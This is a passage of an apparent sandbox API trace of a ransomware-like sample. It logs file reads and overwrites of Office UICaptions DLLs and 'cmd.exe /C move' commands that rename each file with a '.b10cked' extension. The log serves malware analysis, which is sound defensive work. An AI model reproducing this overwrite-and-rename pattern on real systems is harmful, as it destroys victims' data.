lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0173.174] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0173.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0173.176] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0173.177] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0173.177] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0173.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x53960 [0173.177] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0173.318] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0173.318] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0173.319] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x53960 [0173.320] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0173.320] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0173.320] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0173.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0173.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0173.324] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x73960 [0173.324] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0173.324] CloseHandle (hObject=0x114) returned 1 [0173.330] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\VISINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX") returned 0x3c [0173.331] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0173.331] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xa68, dwThreadId=0xb18)) returned 1 [0173.379] CloseHandle (hObject=0x1b4) returned 1 [0173.379] CloseHandle (hObject=0x114) returned 1 [0173.379] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0173.379] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0173.379] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0173.379] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0173.379] ReleaseMutex (hMutex=0xf8) returned 1 [0173.379] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0173.379] ReleaseMutex (hMutex=0xf8) returned 1 [0173.379] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0173.379] ReleaseMutex (hMutex=0xf8) returned 1 [0173.379] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0173.379] ReleaseMutex (hMutex=0xf8) returned 1 [0173.379] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.380] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=23016911445) returned 1 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x24360 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.380] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x24360 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0173.381] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x23e78 [0173.381] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x24360 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x24360 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0173.383] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0173.383] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0173.384] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x31af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x31af, lpOverlapped=0x0) returned 1 [0173.385] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0173.385] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0173.385] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x31af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x31af, lpOverlapped=0x0) returned 1 [0173.385] SetFilePointer (in: hFile=0x114, lDistanceToMove=-74159, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x121b1 [0173.385] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0173.386] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x31af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x31af, lpOverlapped=0x0) returned 1 [0173.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=-74159, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x121b1 [0173.387] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0173.387] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x31af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x31af, lpOverlapped=0x0) returned 1 [0173.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0173.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WWINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 18 [0173.391] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x24360 [0173.391] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0173.391] CloseHandle (hObject=0x114) returned 1 [0173.392] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX") returned 0x3c [0173.393] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0173.394] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xa84, dwThreadId=0x994)) returned 1 [0173.395] CloseHandle (hObject=0x1b4) returned 1 [0173.395] CloseHandle (hObject=0x114) returned 1 [0173.395] GetTickCount () returned 0x327ca [0173.395] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc04 | out: lpPerformanceCount=0x12fc04*=23018446960) returned 1 [0173.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbe0, cbMultiByte=1, lpWideCharStr=0x12ebc8, cchWideChar=2047 | out: lpWideCharStr="\x57\x1c5f\xfc00\x12\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2079\x7691") returned 1 [0173.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbe0, cbMultiByte=1, lpWideCharStr=0x12ebc8, cchWideChar=2047 | out: lpWideCharStr="\x73\x1c5f\xfc00\x12\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2079\x7691") returned 1 [0173.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbe0, cbMultiByte=1, lpWideCharStr=0x12ebc8, cchWideChar=2047 | out: lpWideCharStr="\x50\x1c5f\xfc00\x12\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2079\x7691") returned 1 [0173.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbe0, cbMultiByte=1, lpWideCharStr=0x12ebc8, cchWideChar=2047 | out: lpWideCharStr="\x67\x1c5f\xfc00\x12\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2079\x7691") returned 1 [0173.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbe0, cbMultiByte=1, lpWideCharStr=0x12ebc8, cchWideChar=2047 | out: lpWideCharStr="\x41\x1c5f\xfc00\x12\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2079\x7691") returned 1 [0173.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbe0, cbMultiByte=1, lpWideCharStr=0x12ebc8, cchWideChar=2047 | out: 